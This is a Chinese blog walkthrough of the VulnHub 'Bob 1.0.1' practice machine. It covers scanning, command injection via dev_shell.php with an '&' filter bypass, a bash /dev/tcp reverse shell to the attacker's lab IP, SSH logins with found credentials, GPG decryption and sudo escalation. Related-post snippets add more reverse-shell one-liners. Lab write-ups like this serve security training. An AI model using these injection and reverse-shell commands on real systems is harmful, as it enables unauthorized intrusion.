【vulnhub】Bob:1.0.1靶机

最新推荐文章于 2024-08-31 23:25:02 发布
最新推荐文章于 2024-08-31 23:25:02 发布
阅读量747 收藏 7
点赞数 24
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wbplife/article/details/140936081
版权

靶机安装

下载地址:Bob: 1.0.1 ~ VulnHub

信息收集

扫描靶机IP

nmap 192.168.93.0/24

端口扫描,开放了21,80,25468,其中ssh服务端口改到了25468。

nmap -A 192.168.93.160   -p-

目录扫描

dirsearch -u http://192.168.93.160

进行网址访问

在页面的NEWS里面有一个消息,

即学校主服务器只能在内部访问。

Contact Us页面列出了各部门各员工的电话和email,其中IT部门的Bob可能是管理员。

在Login页面提示外部登录已禁用。

查看页面源代码,可能是我们要想办法用新IT员工的身份?

在网址后面拼接扫描出来的目录/robots.txt

继续拼接这些目录,/dev_shell.php,是一个命令执行功能的页面,测试后发现存在过滤,并不是所有命令都可以被执行的

这里通过管道符'|'列出当前目录下的文件,发现dev_shell.php.bak,即dev_shell.php的备份文件。

访问/lat_memo.html。又是一段Bob留言,告诉我们服务器上存在一个没有保护的webshell。

获取shell

知道服务器存在webshell,很明显dev_shell.php的命令执行是突破点,绕过过滤写入反弹shell

# 攻击机开启监听
nc -lvvp 6767
​
# &符号绕过过滤
whoami & echo "bash -i >& /dev/tcp/192.168.93.130/6767 0>&1" | bash

切换到家目录,发现有四个用户,分别对应Contact Us页面中IT部门的四个工作人员。

进入到bob用户目录下面看看有什么文件,发现里面好像有一个像密码的文件

查看这个文件,像账户密码信息

继续看看其他文件夹,到Documents目录下

查看里面的文件,login.txt.gpg这是一个经过gpg加密的文件,尝试解密

报错,提示权限不够

gpg -d login.txt.gpg

继续深入Secret文件夹,直到/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here发现一个可执行notes.sh文件,但没有看懂

解密login.txt.gpg时提示权限不够,这个账户没权限那就ssh登录到其他账户试试,前面告诉我们jc和seb账户的密码,试试。注意ssh端口是25468。

ssh jc@192.168.93.160 -p 25468
密码:Qwerty

在这个用户里面解密login.txt.gpg文件。权限问题解决了但是密码不知道。

还是要进入到/home/bob/Documents 的目录下面

gpg -d login.txt.gpg

notes.sh应该是密码。百度发现密码就是notes.sh的藏头:HARPOCRATES

重新解密

成功解密,得到Bob密码:b0bcat_

提权

登录Bob账户,想办法提权。sudo -l发现是ALL,直接sudo su。

查看flag

wbplife
关注
  • 24
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BOB1.0.1靶机渗透攻略.pdf
09-21
靶机 Bob 1.0.1 可以在 VulnHub 上找到,这是一个提供实战环境的网站,允许用户下载靶场并进行渗透测试。 渗透攻击过程首先需要使用 Nmap 工具进行扫描,Nmap 是一款强大的网络扫描工具,可以用来发现网络上的主机...
vulnhub Bob: 1.0.1
箭雨镜屋
04-27 1579
渗透思路:nmap扫描----通过robots.txt得到/dev_shell目录----利用RCE得到反弹shell----找到.gpg文件密码并解密----sudo su提权
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7761
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 3006
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
vulnhubBob_1.0.1
qq_45300786的博客
11-24 237
http://www.mamicode.com/info-detail-3079690.html https://www.jianshu.com/p/30165f430175?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation
解决Missing artifact javax.transaction:jta:jar:1.0.1B
12-12
1. 解压文件得到:jta-1_0_1B-classes.zip 2. cmd进入zip文件所在目录 ...mvn install:install-file -Dfile=./jta-1_0_1B-classes.zip -DgroupId=javax.transaction -DartifactId=jta -Dversion=1.0.1B -Dpackaging=jar
mq-msgpush-sdk-1.0.1.jar
05-24
《mq-msgpush-sdk-1.0.1.jar:消息推送SDK详解及应用实践》 在IT行业中,消息推送服务已经成为应用程序与用户互动的关键组件。mq-msgpush-sdk-1.0.1.jar是一个专用于消息推送的Java软件开发工具包(SDK),它允许...
emas-services-1.0.1.jar
09-17
<!... ... <artifactId>emas-services <version>1.0.1 mvn install:install-file -DgroupId=com.aliyun.ams -DartifactId=emas-services -Dversion=1.0.1 -Dpackaging=jar -Dfile=F:\jars\emas-services-1.0.1.jar
geronimo-j2ee-management_1.1_spec-1.0.1-API文档-中文版.zip
04-08
赠送jar包:geronimo-j2ee-management_1.1_spec-1.0.1.jar; 赠送原API文档:geronimo-j2ee-management_1.1_spec-1.0.1-javadoc.jar; 赠送源代码:geronimo-j2ee-management_1.1_spec-1.0.1-sources.jar; 包含...
vulnhub靶场,Bob_v1.0.1
kukudeshuo的博客
08-27 978
vulnhub靶场,Bob_v1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bob-101,226/ 攻击机:kali(192.168.109.128) 靶机Bob_v1.0.1(192.168.109.172) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP地址为192.168.109.172 使用nmap扫描查看目标靶机
Vulnhub靶机 bob
菜浪马废的博客
04-28 267
一个用户名bob 一个提示:运行了webshell 尝试id 有回显 抓包看一下 /bin/nc 192.168.0.128 443 -e /bin/sh 给了个账号 ssh登录 爆破文件 给了bob的账号
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8444
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
minio最新源码编译(处理安全扫描中跨域访问、.js.map等不安全问题) 版本:RELEASE.2024-06-26T01-06-18Z
最新发布
逝水无痕博客
08-31 1069
minio最新源码编译(处理安全扫描中跨域访问、.js.map等不安全问题) 版本:RELEASE.2024-06-26T01-06-18Z
HarmonyOS(52) 使用安全控件SaveButton保存图片
菜鸟博客
08-30 1053
SaveButton 安全控件说明
守护夏日清凉:EasyCVR+AI视频智能管理方案为水上乐园安全保驾护航
TSINGSEE青犀视频官方技术博客
08-28 2862
多协议接入:支持国标GB/T28181协议、JT808、GA/T1400、RTMP、RTSP/Onvif协议、海康Ehome、海康SDK、大华SDK、华为SDK、宇视SDK、乐橙SDK、萤石云SDK等接入,兼容性强。
Python编码系列—Python中的安全密码存储与验证:实战指南
u013889591的专栏
08-27 1340
在数字化时代,密码安全是保护用户数据的首要防线。Python提供了多种工具和库来帮助开发者实现安全的密码存储与验证。本文将深入探讨Python中实现安全密码存储与验证的方法,结合实际案例来讲解。随着网络攻击的日益增多,传统的密码存储方法(如明文存储或使用弱哈希算法)已不再安全。现代Web应用需要采用更安全的策略来保护用户密码,防止数据泄露和未授权访问。安全的密码存储与验证是保护用户数据不被未授权访问的关键。通过使用Python中的hashlib库和盐值,结合密钥派生函数,可以大大提高密码的安全性。
DNS部署与安全
m0_64827698的博客
08-28 1510
子域 二级域 顶级域 根域。本地域名服务器(代替主机迭代)去找根域名服务器——>...服务器——>权威服务 客户端。特定服务 公司或组织的名称 公司/国家/...(网站性质或地域)DNS缓存投毒(改映射)、DNS放大攻击(分布拒绝服务DDOS)、子域名劫持。主机找网关(本地域名服务器) 客户端。DNS查询(小数据包,要求速度快),www通常指公司网站的主服务器。
掌控安全CTF-2024年8月擂台赛-ez_misc
ASD830的博客
08-28 545
用得到的密码(the_password_is_zkaq!)去解密 最后的秘密.zip 压缩包,可以得到一个key.txt和一个加密的flag.zip。这里我们没啥信息可用的了,返回去看看 最后的秘密.zip 压缩包有注释(我最喜欢和超人一起下棋了,哈哈哈哈哈哈!发现需要密钥,超人超人,猜测为“superman”,解密成功得到新的key:s1mple。找到了通往大千世界的旗帜,请提交你的旗帜,然后继续环游世界吧!我们就可以猜测为棋盘解密,找个解密网站(再往下我们又会找到rsa.txt。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值